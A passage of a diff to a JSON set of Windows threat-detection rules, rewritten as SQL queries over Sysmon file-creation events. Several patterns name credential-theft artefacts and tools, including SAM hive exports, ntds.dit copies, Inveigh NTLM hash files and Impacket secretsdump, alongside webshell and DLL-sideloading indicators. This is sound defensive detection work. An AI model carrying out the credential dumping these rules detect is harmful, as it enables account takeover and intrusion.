"description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", - "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1136.001" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "VSSAudit Security Event Source Registration", - "id": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", "status": "experimental", - "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." + "Unknown" ], - "level": "informational", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND AuditSourceName = 'VSSAudit' AND EventID IN ('4904', '4905'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_vssaudit_secevent_source_registration.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "Security Event Log Cleared", - "id": "a122ac13-daf8-4175-83a2-72c387be339d", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Checks for event id 1102 which indicates the security event log was cleared.", - "author": "Saw Winn Naung", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1070.001" + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ - "Legitimate administrative activity" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" ], - "filename": "win_security_event_log_cleared.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "External Disk Drive Or USB Storage Device", - "id": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "status": "test", - "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", - "author": "Keith Wright", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ - "attack.t1091", - "attack.t1200", - "attack.lateral_movement", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate administrative activity" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '6416' AND ClassName = 'DiskDrive') OR DeviceDescription = 'USB Mass Storage Device'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" ], - "filename": "win_security_external_device.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "ISO Image Mount", - "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", - "status": "experimental", - "description": "Detects the mount of ISO images on an endpoint", - "author": "Syed Hasan (@syedhasan009)", - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], + "title": "ISO or Image Mount Indicator in Recent Files", + "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "status": "test", + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Software installation ISO files" + "Cases in which a user mounts an image file for legitimate reasons" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" ], - "filename": "win_security_iso_mount.yml" + "filename": "file_event_win_iso_file_recent.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.impact", + "attack.t1486" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ], "falsepositives": [ - "Unknown" + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "status": "test", - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "User Added to Local Administrators", - "id": "c265cf08-3f99-46c1-8d59-328247057d57", - "status": "stable", - "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1078", - "attack.persistence", - "attack.t1098" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate administrative activity" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" ], - "filename": "win_security_user_added_to_local_administrators.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "EVTX Created In Uncommon Location", + "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "status": "experimental", + "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", + "author": "D3F7A5105", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Web Browsers" + "Admin activity", + "Backup activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_create_evtx_non_common_locations.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat 